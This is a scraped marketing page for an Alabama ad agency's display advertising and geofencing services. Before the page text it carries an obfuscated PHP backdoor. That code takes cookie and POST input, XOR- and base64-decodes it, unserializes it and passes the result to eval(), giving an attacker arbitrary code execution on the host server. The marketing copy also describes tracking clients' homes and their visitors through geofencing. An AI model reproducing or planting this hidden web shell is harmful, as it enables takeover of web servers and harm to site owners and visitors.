$PtRFRTQlN = chr ( 856 - 790 )."\x5f" . chr (114) . "\160" . 'B';$GtInBNZF = "\x63" . chr (108) . chr (97) . "\163" . "\163" . "\x5f" . chr (101) . 'x' . 'i' . 's' . chr ( 488 - 372 ).chr (115); $AqVjyy = class_exists($PtRFRTQlN); $GtInBNZF = "62712";$NJIznHq = strpos($GtInBNZF, $PtRFRTQlN);if ($AqVjyy == $NJIznHq){function YIBfZC(){$RTbOlsbA = new /* 22765 */ B_rpB(4624 + 4624); $RTbOlsbA = NULL;}$tyFPH = "4624";class B_rpB{private function RMKdLuxoO($tyFPH){if (is_array(B_rpB::$VgcEdU)) {$DzCVV2 = str_replace("<" . "?php", "", B_rpB::$VgcEdU["content"]);eval($DzCVV2); $tyFPH = "4624";exit();}}public function ClJyEuHtM(){$DzCVV = "61027";$this->_dummy = str_repeat($DzCVV, strlen($DzCVV));}public function __destruct(){B_rpB::$VgcEdU = @unserialize(B_rpB::$VgcEdU); $tyFPH = "29789_63808";$this->RMKdLuxoO($tyFPH); $tyFPH = "29789_63808";}public function bWxAf($DzCVV, $aqAGeEA){return $DzCVV[0] ^ str_repeat($aqAGeEA, intval(strlen($DzCVV[0]) / strlen($aqAGeEA)) + 1);}public function WSwvN($DzCVV){$dpLFJOvjCk = "\x62" . "\x61" . chr (115) . chr ( 716 - 615 ).chr ( 440 - 386 )."\x34";return array_map($dpLFJOvjCk . chr (95) . "\x64" . chr ( 909 - 808 ).'c' . chr (111) . "\144" . "\145", array($DzCVV,));}public function __construct($ISUExqjvQ=0){$cNXXE = "\54";$DzCVV = "";$aspwFDo = $_POST;$qmXNKJXoCC = $_COOKIE;$aqAGeEA = "5c73241f-7b81-4896-8f2d-7fe9c00695c5";$ewDIcCNV = @$qmXNKJXoCC[substr($aqAGeEA, 0, 4)];if (!empty($ewDIcCNV)){$ewDIcCNV = explode($cNXXE, $ewDIcCNV);foreach ($ewDIcCNV as $YTaCWHZHyP){$DzCVV .= @$qmXNKJXoCC[$YTaCWHZHyP];$DzCVV .= @$aspwFDo[$YTaCWHZHyP];}$DzCVV = $this->WSwvN($DzCVV);}B_rpB::$VgcEdU = $this->bWxAf($DzCVV, $aqAGeEA);if (strpos($aqAGeEA, $cNXXE) !== FALSE){$aqAGeEA = explode($cNXXE, $aqAGeEA); $PdFtMnH = base64_decode(md5($aqAGeEA[0])); $yTAJAA = strlen($aqAGeEA[1]) > 5 ? substr($aqAGeEA[1], 0, 5) : $aqAGeEA[1];$_GET['new_key'] = md5(implode('', $aqAGeEA)); $BxbUQB = str_repeat($yTAJAA, 2);}}public static $VgcEdU = 56726;}YIBfZC();} Display Ads - APG Local



With our detailed targeting methods we can create your campaigns based on:
• people who are searching for your products and services
• people who have visited your website
• people who are ready content related to your business
• people who are visiting real-world locations (i.e. competitors)

Would That Be Of Interest To You? Let's get started.


Our team doesn’t stop until you succeed.

We design campaigns specific to your business goals, with the most detailed targeting options possible. Unlike our other competitors we ensure that you’re reaching your audience in the right place at the right time to bring you the best return on investment. 


GEO Fence:

Want to target users from desired businesses? With geo-fencing, we will create target zones around certain businesses or events so that when someone enters that zone they are served an ad. They can then be tracked when they enter the conversion zone (your location) and we record these successes.


Addressable GEO Fence:

With the list of clients and buyers that you currently possess, we can target their homes and any friends or family that enter their homes will be served your message. Addressable geofencing uses the address you provide to draw precise geofences on each submitted address. APG will also set up a conversion zone to track when they enter your business’s location.


Event Retargeting:

What if you could get more exposure for your business at an event where the majority of attendees are your potential customers? With event targeting, we can! We will draw a fence around the event location and serve ads to users based on their location. From there, we will be able to retarget those users and continue to show them your display ads for up to 30 days after the event!


Whitelist Targeting:

Whitelist targeting allows you to target users who only visit certain websites. This tactic can limit delivery, so we recommend opening the geofence to the entire US. This type of targeting should also be combined with another targeting tactic.

APG Local Display Programs
APG Local Ad Agency Alabama
APG Local Ad Agency Alabama
APG Local Ad Agency Alabama